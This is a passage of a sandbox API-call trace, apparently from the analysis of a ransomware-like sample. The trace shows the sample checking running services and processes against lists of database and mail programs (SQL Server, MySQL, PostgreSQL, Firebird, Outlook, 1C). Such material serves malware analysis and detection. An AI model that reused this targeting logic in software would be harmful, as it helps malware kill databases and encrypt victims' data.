lpString2="RpcSs") returned -1 [0039.696] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0039.696] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0039.696] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0039.696] lstrlenW (lpString="SamSs") returned 5 [0039.696] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0039.696] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0039.696] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0039.696] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0039.696] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0039.696] lstrlenW (lpString="Schedule") returned 8 [0039.696] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0039.696] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0039.696] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0039.696] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0039.696] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0039.696] lstrlenW (lpString="SENS") returned 4 [0039.696] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0039.696] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0039.696] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0039.696] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0039.696] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0039.696] lstrlenW (lpString="ShellHWDetection") returned 16 [0039.696] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0039.696] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0039.696] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0039.696] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0039.696] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0039.696] lstrlenW (lpString="Spooler") returned 7 [0039.696] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0039.696] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0039.697] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0039.697] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0039.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0039.697] lstrlenW (lpString="SysMain") returned 7 [0039.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0039.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0039.697] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0039.697] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0039.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0039.697] lstrlenW (lpString="Themes") returned 6 [0039.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0039.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0039.697] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0039.697] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0039.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0039.697] lstrlenW (lpString="TrkWks") returned 6 [0039.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0039.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0039.697] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0039.697] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0039.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0039.697] lstrlenW (lpString="UxSms") returned 5 [0039.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0039.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0039.697] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0039.697] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0039.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0039.697] lstrlenW (lpString="WdiServiceHost") returned 14 [0039.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0039.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0039.697] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0039.697] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0039.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0039.697] lstrlenW (lpString="WdiSystemHost") returned 13 [0039.698] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0039.698] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0039.698] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0039.698] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0039.698] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0039.698] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0039.698] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0039.698] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0039.698] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0039.698] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0039.698] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0039.698] lstrlenW (lpString="Winmgmt") returned 7 [0039.698] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0039.698] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0039.698] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0039.698] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0039.698] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0039.698] lstrlenW (lpString="WPDBusEnum") returned 10 [0039.698] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0039.698] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0039.698] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0039.698] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0039.698] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0039.698] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f740a8 | out: hHeap=0x600000) returned 1 [0039.698] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ac [0039.700] Process32FirstW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0039.701] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0039.702] lstrlenW (lpString="System") returned 6 [0039.702] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0039.702] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0039.702] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0039.702] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0039.702] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0039.702] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0039.702] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0039.702] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0039.703] lstrlenW (lpString="smss.exe") returned 8 [0039.703] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0039.703] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0039.703] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0039.703] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0039.703] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0039.703] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0039.703] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0039.703] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0039.704] lstrlenW (lpString="csrss.exe") returned 9 [0039.704] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0039.704] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0039.704] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0039.704] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0039.704] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0039.704] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0039.704] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0039.704] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0039.705] lstrlenW (lpString="wininit.exe") returned 11 [0039.705] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0039.705] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0039.705] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0039.705] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0039.705] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0039.705] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0039.705] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0039.705] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0039.706] lstrlenW (lpString="csrss.exe") returned 9 [0039.706] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0039.706] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0039.706] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0039.706] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0039.706] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0039.706] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0039.706] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0039.707] lstrlenW (lpString="winlogon.exe") returned 12 [0039.707] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0039.708] lstrlenW (lpString="services.exe") returned 12 [0039.708] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0039.709] lstrlenW (lpString="lsass.exe") returned 9 [0039.709] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0039.711] lstrlenW (lpString="lsm.exe") returned 7 [0039.711] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.712] lstrlenW (lpString="svchost.exe") returned 11 [0039.712] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.713] lstrlenW (lpString="svchost.exe") returned 11 [0039.713] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.714] lstrlenW (lpString="svchost.exe") returned 11 [0039.714] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.714] lstrlenW (lpString="svchost.exe") returned 11 [0039.714] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.715] lstrlenW (lpString="svchost.exe") returned 11 [0039.715] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0039.717] lstrlenW (lpString="audiodg.exe") returned 11 [0039.717] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.717] lstrlenW (lpString="svchost.exe") returned 11 [0039.717] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.718] lstrlenW (lpString="svchost.exe") returned 11 [0039.718] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0039.719] lstrlenW (lpString="dwm.exe") returned 7 [0039.719] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0039.720] lstrlenW (lpString="explorer.exe") returned 12 [0039.720] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0039.721] lstrlenW (lpString="spoolsv.exe") returned 11 [0039.721] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0039.721] lstrlenW (lpString="taskhost.exe") returned 12 [0039.721] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.722] lstrlenW (lpString="svchost.exe") returned 11 [0039.722] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0039.723] lstrlenW (lpString="taskeng.exe") returned 11 [0039.723] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0039.723] lstrlenW (lpString="taskhost.exe") returned 12 [0039.723] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0039.724] lstrlenW (lpString="challenging.exe") returned 15 [0039.724] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0039.725] lstrlenW (lpString="pgp prix.exe") returned 12 [0039.725] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0039.726] lstrlenW (lpString="user-reno.exe") returned 13 [0039.726] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0039.726] lstrlenW (lpString="aggregate.exe") returned 13 [0039.726] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0039.727] lstrlenW (lpString="dressed.exe") returned 11 [0039.727] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0039.728] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0039.728] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0039.729] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0039.729] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0039.730] lstrlenW (lpString="developing.exe") returned 14 [0039.730] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0039.731] lstrlenW (lpString="supported.exe") returned 13 [0039.731] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0039.732] lstrlenW (lpString="girlstionselect.exe") returned 19 [0039.732] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0039.732] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0039.732] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0039.733] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0039.733] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0039.734] lstrlenW (lpString="eating.exe") returned 10 [0039.734] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0039.735] lstrlenW (lpString="nh_protected.exe") returned 16 [0039.735] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0039.735] lstrlenW (lpString="vulnerability.exe") returned 17 [0039.735] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0039.736] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0039.736] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0039.737] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0039.737] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0039.737] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0039.737] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0039.738] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0039.738] Process32NextW (in: hSnapshot=0x1ac, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0039.739] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0039.739] Process32NextW (in: hSnapshot=0x1ac, 